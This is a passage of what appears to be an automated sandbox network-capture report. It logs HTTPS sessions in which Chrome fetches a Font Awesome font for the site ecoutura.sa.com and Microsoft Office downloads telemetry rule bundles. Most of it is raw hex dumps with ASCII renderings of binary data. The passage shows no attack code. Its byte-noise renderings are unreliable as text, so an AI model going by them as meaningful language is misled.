                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: ca ba 94 0d fa 07 79 d9 e8 25 b1 36 65 d3 88 58 87 b2 39 65 0b 62 5d ca 61 48 37 37 e5 f0 88 6e 1e ca d1 94 63 88 f5 29 a7 22 b1 21 e5 aa 82 d8 88 f2 30 e5 91 f1 58 5e 1e 53 62 53 ca 53 12 9b 51 9e 8b 88 cd 29 2f 51 5e 21 b6 a0 bc 86 c4 d6 94 8f 24 b6 a1 7c 2a b1 2d e5 2b 89 ed 28 3f 45 c4 f6 94 bf 28 7f 13 3b 50 fe 45 fa 33 29 ff 4b ec 44 1d 24 b1 33 75 54 89 5d a8 93 4b ec 4a 9d 52 62 37 ea 54 05 31 15 75 76 ea 9c 4f e7 f2 3a b7 05 b1 17 75 3e ea fc cf e0 f2 ba a0 12 fb 52 17 91 d8 8f ba 98 c4 fe d4 25 24 0e a0 2e 25 71 20 75 19 89 83 a8 2b 48 1c 4c 5d 59 e2 10 ea aa 12 87 52 d7 90 38 8c ba 6e 41 1c 4e dd 90 ba d1 b8 37 af 9b 18 11 47 51 37 a3 6e 4e 1c 4d dd 9a 92 71 2c 75 5b ea 4e c4 71 d4 5d a9 bb 13 a7 50 f7 24 22 4e a7 ee 43 dd 8f 38 83 7a 10 05 dd
                                                                                        Data Ascii: y%6eX9eb]aH77nc)"!0X^SbSSQ)/Q^!$|*-+(?E(;PE3)KD$3uT]KJRb7T1uvO:u>R%$.%q u+HL]YR8nAN7GQ7nNMq,u[Nq]P$"NC8z
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: 89 98 f2 28 d4 26 e6 7c 14 1a 13 db 11 85 16 c4 65 14 5a 12 57 a0 d0 9a 78 8f 42 1b e2 4b a0 d0 9e f8 51 28 74 26 f6 01 14 ba 10 73 0b 0a 3d 88 1f 87 c2 58 a2 7f 50 98 40 dc 01 14 26 7a 3c ac 92 f8 d1 28 ac 21 ae 1e 0a db 88 ed 87 c2 4e 62 1f 47 61 17 71 dd 50 38 9c e8 63 14 8e 20 e6 55 14 ce 24 e6 4a 14 ce 25 f6 3e 14 ce 27 76 09 0a 97 10 9d 84 c2 a5 c4 ec 40 e1 5a a2 cb 51 b8 8e d8 3f 51 b8 99 b8 f3 51 b8 83 d8 4f 51 b8 9b e8 58 14 1e 23 76 1b 0a 8f 13 33 0b 85 27 88 ef 8c c2 93 c4 7d 87 c2 d3 c4 cd 46 e1 19 a2 bf 50 78 8e d8 83 28 bc 40 dc 36 14 5e 26 e6 13 14 5e 23 f6 68 14 de 24 f6 28 14 de 22 ee 2b 14 de 21 6e 37 0a ef 13 77 39 0a 1f 12 77 3b 0a 9f 11 9d 8b c2 17 c4 5c 83 c2 d7 c4 f4 47 e1 3b e2 c6 a1 f0 23 71 06 85 48 74 19 0a 87 88 ae 45 d1 11 f7
                                                                                        Data Ascii: (&|eZWxBKQ(t&s=XP@&z<(!NbGaqP8c U$J%>'v@ZQ?QQOQX#v3'}FPx(@6^&^#h$("+!n7w9w;\G;#qHtE
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: 1f 22 37 46 cc ef c8 8d 13 76 42 6e 92 f8 e3 68 f4 34 e2 9f 8b 46 4f 27 de 2c 34 7a 39 31 6f a0 d1 1b 89 f1 d1 e8 33 c4 ff 19 8d ae fd 4f 8a b9 98 12 4c b5 b5 5c 6d ca 44 24 6c c8 30 e4 79 90 d7 b3 9e b4 d1 d7 a8 67 41 9e d6 d3 9e 2c c8 fb 1a 7d 69 96 0f 34 f3 2c 6b e6 9b 67 b5 b4 96 f6 64 e5 a0 1c 6c 9e 0d d6 07 eb 3d 0b 5b ad 56 ab fe e4 93 4f b6 46 96 8f 8c 8c 8c 34 9e 7c f2 c9 91 d6 e4 0f 8a e2 44 9b 25 71 24 45 71 32 f9 55 12 47 9a 5d 14 45 31 f9 df ec a2 68 17 45 a1 ce a2 5d 14 dd 49 1c 49 51 9c 4c 1e 92 c4 91 14 c5 89 6e 03 f0 a6 fe 9d fa 8a 9d 75 1b 55 b6 80 e9 33 ea 59 36 d8 b7 45 50 ae f6 64 49 5a 6b 0c e5 cd e1 1e bf 99 37 eb 83 f5 72 50 4e 6b e9 c2 30 8c e3 30 0c c3 38 0e c3 cd d2 ce 4a a5 33 4d 3b 2b 95 ce 54 cb e3 30 0c c3 78 8a 38 0c c3 30
                                                                                        Data Ascii: "7FvBnh4FO',4z91o3OL\mD$l0ygA,}i4,kgdl=[VOF4|D%q$Eq2UG]E1hE]IIQLnuU3Y6EPdIZk7rPNk008J3M;+T0x80


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.449788104.17.24.144435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:36 UTC653OUTGET /ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Origin: https://ecoutura.sa.com
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: font
                                                                                        Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:37 UTC975INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:37 GMT
                                                                                        Content-Type: application/octet-stream; charset=utf-8
                                                                                        Content-Length: 116672
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: "656632a7-1c7c0"
                                                                                        Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 585535
                                                                                        Expires: Wed, 22 Oct 2025 12:46:37 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uE5zFecCbAhRVVBml2OQXBW4PO7yTpOPrpOQj1kwSX34pnY1wTkpvw8FBN4VXj5OrcUpZrvDhguNzRIt0qil8Y00mVfQbjaMFP9ZQmesaMqdngeT%2BofuWQTKy812kw%2BiKXVW0Ks8"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfd195f6845f4-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:37 UTC394INData Raw: 77 4f 46 32 00 01 00 00 00 01 c7 c0 00 0a 00 00 00 03 0e 91 00 01 c7 73 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 90 48 00 a5 56 ca 8b cc 10 cb 90 4c 05 88 1d 07 20 25 48 87 71 6a 08 dd 30 3d 00 00 b4 fa 79 50 46 f4 a4 d5 e2 01 50 55 55 4f 09 61 5e db f6 2a 20 fc f4 cb 6f 7f fc e5 6f ff f8 d7 7f fe f7 97 81 b1 3b 20 96 ed b8 9e 6f f8 ff 7e bf d7 75 f6 7f 2f c0 ec 62 93 f6 96 59 d6 75 2a e3 4b b7 a0 aa be 90 11 32 aa 80 77 fc 1f 5f 09 e8 82 70 96 d8 b4 ac 9d e8 31 d1 6e 2f a2 ce 8b 98 d3 09 2f 46 92 a3 74 f6 e5 01 e4 4f ec 65 2e d2 89 3a 81 e8 d4 dd b9 c9 3f 01 9e a7 9c e6 fb ce c6 aa bc 96 42 b2 55 e0 80 0a 34 01 a9 84 47 22 bb 40 37 e0 1b 91 4a c0 49 f6 54 5a 42 9e 91 c7 cb ff 87 33 fd 9f 3b a0 11
                                                                                        Data Ascii: wOF2s6$ `HVL %Hqj0=yPFPUUOa^* oo; o~u/bYu*K2w_p1n//FtOe.:?BU4G"@7JITZB3;
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: 76 17 95 45 34 79 e0 81 1f 44 43 74 91 10 31 62 7c e2 2f 01 12 f2 95 e8 d7 24 c4 9d d8 bc ff 1f a7 e5 bf fb 24 bd 27 59 b2 08 6d d9 92 2c c9 b1 e3 c4 b2 ad c8 c1 81 74 93 81 cd 2c 36 8b 90 a5 4e 69 b6 e5 f9 29 21 66 97 e7 b4 b3 2d 4f 11 3e 20 27 3f cf cf 9a 7f cf d5 a7 92 bc 98 bc c9 4c 32 93 97 e4 e5 65 44 57 d9 65 97 15 63 59 d8 c5 a5 e2 f3 ff 87 2a d4 a9 d3 42 9d f6 0b fd 0a d5 2d 35 a3 d4 8c 2f 66 19 ff ff 69 9a de f7 ff cc ff 33 ac 61 69 24 db b2 25 5b 36 cb 80 4b f6 02 60 80 c0 61 07 78 83 ec b6 09 3b 05 4c d8 a7 71 4e 5d 76 79 0b ec 02 6f 43 08 ff cf f3 67 fe 3a bb 33 05 a7 f2 ad 94 49 95 0a 1c 64 a0 97 9f bc 5a fa 94 fc ef 7b 2b ad f6 40 02 65 46 56 f7 cc b4 d4 39 32 46 c8 75 81 a3 e5 56 69 db d7 39 f7 fd c5 7d ef 7f b3 79 df 3d 16 df 3d 72 f1 3d
                                                                                        Data Ascii: vE4yDCt1b|/$$'Ym,t,6Ni)!f-O> '?L2eDWecY*B-5/fi3ai$%[6K`ax;LqN]vyoCg:3IdZ{+@eFV92FuVi9}y==r=
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: a1 07 f4 84 5e d0 1b fa 40 5f e8 07 fd 61 00 0c 84 41 30 18 86 c0 50 18 06 c3 61 04 8c 84 51 30 1a c6 c0 58 18 07 e3 61 02 4c cc 57 22 5f ab 7c ad f3 b5 c9 d7 2e df 6a cd 4f 8b d0 1c 5a 56 ad 81 d6 52 6b a7 cd d2 e6 39 ff 27 3e 4b aa 9e d4 3d e9 7d b2 92 5c 31 b9 61 f2 fa e4 8d c9 db 52 4a a4 0c 4f 39 92 72 57 0f d2 e3 f5 42 7a 31 bd 8a 5e c3 e8 67 0c 30 66 18 8b 8c 15 c6 46 e3 b5 e1 c4 08 cc 8f 05 b1 2c 56 c6 36 d8 11 fb e2 00 1c 88 43 71 04 8e c4 d1 38 15 a7 e3 2c 5c 8c ab 70 1d 6e c4 2d 78 00 cf e2 15 7c 84 6f f1 07 fe 45 13 d3 c8 4e 01 24 28 9a 8a 53 49 2a 47 55 a9 31 75 a5 1e 34 88 86 d2 70 9a 4a 33 68 01 ad a0 55 b4 9a d6 d3 46 da 43 07 e9 10 1d a1 53 74 8e ee d0 07 fa 42 1a 77 e6 31 3c 85 55 9e cd f3 78 29 af e5 0d bc 95 77 f1 09 be cc d7 f8 16 df
                                                                                        Data Ascii: ^@_aA0PaQ0XaLW"_|.jOZVRk9'>K=}\1aRJO9rWBz1^g0fF,V6Cq8,\pn-x|oEN$(SI*GU1u4pJ3hUFCStBw1<Ux)w
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: 35 16 2d 33 c7 ea 2c da 66 8e 35 58 f4 e9 1c 6b b2 b8 fd 1c 6b b1 78 d6 1c 6b b3 78 b5 39 d6 61 f1 a5 73 ac cb e2 cb e7 58 8f c5 d7 8c 61 7d 96 4c 60 c9 44 6c c0 92 7d 68 4c 1b b1 e4 0e 96 dc 85 8d 59 f2 12 4b 5e c6 69 dc a8 f0 18 b6 a0 d1 83 46 6f 6c 49 63 34 0d b1 2d 8d b1 34 c6 63 b8 ab 31 9b c6 dc a3 ab b1 0c 8d 65 f1 18 37 77 7e cc d1 86 e6 ae 43 b4 a6 79 2c cd e3 f0 19 37 cf e0 39 f6 a0 79 de 10 7b d2 bc 94 e6 e5 98 ec 6a be 47 f3 43 dc c5 cd 05 c7 1c 07 92 3a cf 71 10 69 c4 1c 5d 48 a3 be f2 a5 96 71 9a c6 43 1c 4c 9a 4d 9a 83 b5 38 6d c8 73 b4 24 6d 36 c7 61 a4 9d c6 08 b7 90 76 26 ed 8a c3 49 bb 11 ca e3 ef 4e da 0b 47 91 f6 21 ed 8b e3 48 fb f1 1e 3a 9e b4 3f e9 00 9c 40 3a 94 74 14 4e 22 1d 43 3a 16 67 90 4e a0 31 9c 45 3a 95 74 26 ce 26 5d 40
                                                                                        Data Ascii: 5-3,f5Xkkxkx9asXa}L`Dl}hLYK^iFolIc4-4c1e7w~Cy,79y{jGC:qi]HqCLM8ms$m6av&ING!H:?@:tN"C:gN1E:t&&]@
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: f7 cc 29 37 2f 29 15 4a ea 37 af 66 9d 7c a9 54 ba b5 74 ab d4 c3 27 c4 76 e4 c1 13 2e e7 50 a2 89 ec f8 6f 49 f5 b5 39 e1 72 13 57 5a 9e 8c c7 e3 f1 73 65 d3 b3 e7 53 d8 82 29 7a 35 42 7e 5f 69 1d 85 a1 ee 67 9b 3a d2 4a 47 2a e2 06 37 d2 54 27 dc f0 4a 16 29 a5 fb b8 11 7d 7d 6e f0 50 07 dc 88 bb 69 32 18 e8 cd 78 53 c7 5a eb 24 fd df 15 b6 4e 55 54 e4 be 7d a4 24 4d b5 d6 9b 75 ae 49 91 17 03 bd 55 e4 d9 c4 b5 2c 4c 60 53 72 13 13 c7 76 37 36 9b 0b 40 28 76 aa 9a 40 a4 aa 41 e4 0a c3 f0 2a b5 a0 ba aa ff 51 10 c0 af d5 43 c1 28 33 84 23 bd 30 2c eb 46 0d 63 42 ec 9a 26 51 b5 1a 44 52 72 e6 fb b5 40 59 96 0b 53 cb 72 97 c0 24 8e ed 4a ce b1 c9 a5 28 97 98 c1 4b 02 98 69 0a b7 de 68 2f fa be 6d 92 8e 6b 59 96 e5 c6 84 73 cb 10 42 0a ca 18 37 0c 62 38 4e
                                                                                        Data Ascii: )7/)J7f|Tt'v.PoI9rWZseS)z5B~_ig:JG*7T'J)}}nPi2xSZ$NUT}$MuIU,L`Srv76@(v@A*QC(3#0,FcB&QDRr@YSr$J(Kih/mkYsB7b8N
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: 55 f1 bb f7 ff 0f 86 a0 94 71 21 c4 6c ea 01 78 30 12 42 70 78 8e 10 82 df 76 1b 17 42 08 4a d9 c4 f6 7d 7b c2 28 15 31 52 55 46 23 f8 14 8c 50 88 56 b2 b6 d3 77 22 51 27 b3 dc 7d 27 d4 d8 cd 5c e1 60 83 38 eb 6c 22 db 0c b7 e7 9b a6 7f c1 03 46 b5 66 30 ce a3 f7 8d 9a 38 c4 34 c3 29 ed a1 82 f6 78 e5 89 84 51 2a 80 cf 1e cb e2 1b 60 f4 e7 66 36 7d 7c 8c ca f3 3d d8 84 09 3a 84 2e c2 63 46 ff 38 d4 51 a0 27 96 12 a7 e2 7c 80 c8 ec 15 26 d2 6e f7 73 d9 31 70 b2 69 76 16 56 52 60 03 47 9d fd 0b a5 72 5b 27 43 d8 7c 52 92 04 8d b9 9b 76 fd 85 fa 26 94 d5 89 20 cd 46 65 61 a1 43 9b b4 14 e1 19 53 90 2b 3b 62 84 e6 53 8c 60 8a 4e a2 9b 10 02 16 b1 14 a9 48 a1 29 f8 f2 81 94 fc db b0 0e 32 0f 36 66 44 b3 33 c3 10 43 1e 21 49 93 54 25 3c 73 3d ba 32 cf 31 ce f3
                                                                                        Data Ascii: Uq!lx0BpxvBJ}{(1RUF#PVw"Q'}'\`8l"Ff084)xQ*`f6}|=:.cF8Q'|&ns1pivVR`Gr['C|Rv& FeaCS+;bS`NH)26fD3C!IT%<s=21
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: 53 3b 70 35 c1 e6 d5 cb b5 2a e0 e5 7d 87 cf 4e d6 75 55 04 10 a9 2e 18 85 d3 c0 1a be b6 23 8f f3 52 6f 29 5e 3f bc 6f 19 ef 4d 20 52 dd ae 8a c0 f7 c8 ff 0c 76 e0 43 e8 69 a9 04 97 5b 56 9b 3a ca 0a 94 d8 33 af b5 7b ec 62 a6 42 26 dc eb 22 fb 4d bd 07 b8 cc 82 d2 a9 9f 5f 46 b0 a9 25 69 a1 b9 4e f8 13 9b 94 30 2a 17 0f 60 a8 35 ea aa ea 4a c3 1d 16 27 fc 6a 2d 60 14 83 34 47 3e 28 8e e4 16 40 e0 07 72 bb 7d 9f 7f e2 dc 6e bb c3 e2 84 13 46 42 72 83 50 c7 91 76 10 d8 8c 6d b7 e1 3a d9 08 2c db aa b8 c0 2d bb 54 5e 6c 2e 8d aa 91 20 26 e7 18 80 09 47 4a 83 51 4c c0 e0 06 36 dd 8f 22 63 23 a5 04 30 7a e4 c7 95 dc 20 84 50 dc 6a 99 25 fe f0 f0 63 98 a0 18 93 0c 44 9e 14 85 84 82 08 ca 45 13 ec 91 9a 72 d0 67 ca e7 18 dc ef 09 97 7c cb 12 e6 f4 c1 a1 a5 b6
                                                                                        Data Ascii: S;p5*}NuU.#Ro)^?oM RvCi[V:3{bB&"M_F%iN0*`5J'j-`4G>(@r}nFBrPvm:,-T^l. &GJQL6"c#0z Pj%cDErg|
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: 2f 71 d3 ae 54 02 e8 76 fb 44 6f 9e 37 d2 9b 44 df 57 4e 61 0a 53 74 0c 21 5f a5 83 4f 18 2c 1f 59 14 7a a0 b9 0e 75 a1 07 3a 57 6a 50 9d c5 df 51 ba d0 d5 20 a6 e4 0b 40 85 5a e9 81 4e 75 f8 3f 27 4f 9e a4 f4 0c a3 bb 94 9e fc d6 65 98 9d 61 60 9c bc ec 5b df ba ec a4 01 ec 0c c3 97 7d 0b 9e b4 be be 4e e9 01 8c 0f 50 ba 7e fa 25 ff be 7e 93 81 0f 60 76 96 c1 c6 fa 4b 5e b2 be 01 ec 2c c3 07 b0 71 d3 fa bf bf e4 34 42 88 20 34 f7 03 d6 55 50 0d e5 08 f5 04 b4 89 f1 95 5b 69 92 f6 3c cf eb 68 8f 70 41 1b 0f ea f5 0e 8e cc 7e a0 0b 58 71 64 e0 4a 29 83 50 ba 86 e1 cc 7e 0c d3 8b 06 83 01 94 97 1b 51 28 1c 47 84 51 bd ec 4a 71 e0 f3 86 94 41 24 5d d7 0d 85 e3 18 ff 3c 1b c1 74 3e c6 7d d5 86 2b 23 b5 b0 10 29 29 19 13 97 89 2b 7d c5 af b8 84 40 a7 d0 d3 d0
                                                                                        Data Ascii: /qTvDo7DWNaSt!_O,Yzu:WjPQ @ZNu?'Oea`[}NP~%~`vK^,q4B 4UP[i<hpA~XqdJ)P~Q(GQJqA$]<t>}+#))+}@
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: 87 8c c3 86 e9 38 66 70 c7 1d 77 dc f1 ca ed 67 08 31 09 d9 1d 47 dc 15 ee c2 13 78 12 df 8d 67 f0 0b f8 3d 6a d2 88 a6 84 8c 8a a4 c8 e7 92 6e b9 50 33 35 0b 9a ab b2 42 a5 2a 5f 0f e5 db 01 79 db ec f6 c2 66 92 35 93 2a 2d 8a 0a ea 48 25 b2 cb 03 17 a5 4a b3 f5 b9 91 54 a1 12 f2 e7 27 6a 12 25 49 a2 86 7f e4 27 9b 64 52 a5 ef 9d 50 4e a2 8b 98 b2 44 85 52 0e 53 77 12 15 47 81 7e 31 51 61 f4 ec cb e4 f2 43 3e 86 d5 db 81 ea b6 b0 3d 89 92 c7 ce 34 99 96 60 30 46 a5 a6 c9 44 25 2a 2e a7 55 a5 16 65 a2 a4 76 63 5a 3e cd 9d 57 6a 56 2e aa 46 a1 de 0e 14 b7 4d 17 66 65 f5 a8 f3 4b 3d e3 a2 60 72 6b e6 b3 42 e6 d2 41 66 31 0d c9 8b 52 4d e7 73 35 93 3e 34 50 04 c7 c2 f5 99 96 4a 48 f7 4b f7 a2 52 2a 4e b2 d1 d5 a5 8a 93 a2 92 a8 3a ed 9c 42 5e 15 b3 6a 51 2a
                                                                                        Data Ascii: 8fpwg1Gxg=jnP35B*_yf5*-H%JT'j%I'dRPNDRSwG~1QaC>=4`0FD%*.UevcZ>WjV.FMfeK=`rkBAf1RMs5>4PJHKR*N:B^jQ*
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: 5e f4 c2 a7 b6 bf b5 7d d3 f7 be f7 bd 7f f9 e5 77 bf fb dd 6f 43 8a 0f 5d 5a cc bf 0a ff 05 df 42 4f 40 a8 97 0c b4 de f2 5e f1 62 82 8e 6e c6 04 ae b0 c6 dc 12 78 11 a9 13 f0 01 83 ad 41 32 15 0d c4 25 d8 58 5f 14 c0 9f 76 3c cf 71 9a ad d5 0b cf 3b 6f 41 62 22 29 75 aa aa d5 c5 38 ea b6 30 76 a4 a4 18 db 96 69 db e5 b2 5b 62 98 38 9e e7 3a 04 07 65 e1 18 06 00 70 a3 cc ad 52 c5 0f 03 21 4b 1c 53 29 84 00 db 76 38 7d e2 62 ab d5 5b 5d 5d ed 74 dd 60 b1 79 fe 52 d2 6a 38 4e d2 6c f9 91 65 01 f6 00 18 37 0d 4a c3 7a 3d f4 6c ab e2 59 84 f9 81 ef 87 f5 4e ad cc 0d af ec 12 e6 56 2a 96 59 e2 b6 5f 2e 03 8b 54 c5 24 84 73 8c 85 6d 5b 26 a5 08 21 86 d0 9c b7 32 b4 84 5a 68 1b 9d 44 bb 08 f5 44 58 40 ba d8 2a 9d f6 ce 8b 4e a7 03 d0 c0 81 68 7d fe 79 89 27 a0
                                                                                        Data Ascii: ^}woC]ZBO@^bnxA2%X_v<q;oAb")u80vi[b8:epR!KS)v8}b[]]t`yRj8Nle7Jz=lYNV*Y_.T$sm[&!2ZhDDX@*Nh}y'


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        34192.168.2.44979113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:43 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:43 UTC492INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:43 GMT
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 218853
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public
                                                                                        Last-Modified: Fri, 01 Nov 2024 06:15:12 GMT
                                                                                        ETag: "0x8DCFA3C8B31D3C9"
                                                                                        x-ms-request-id: b82d4cd6-601e-00ab-7849-2c66f4000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124643Z-176bd8f9bc55qmmkhC1DFW300000000000hg000000001cu4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:43 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                        2024-11-01 12:46:43 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                        Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                                                        2024-11-01 12:46:43 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                                                        Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                                                        2024-11-01 12:46:43 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                                                        Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
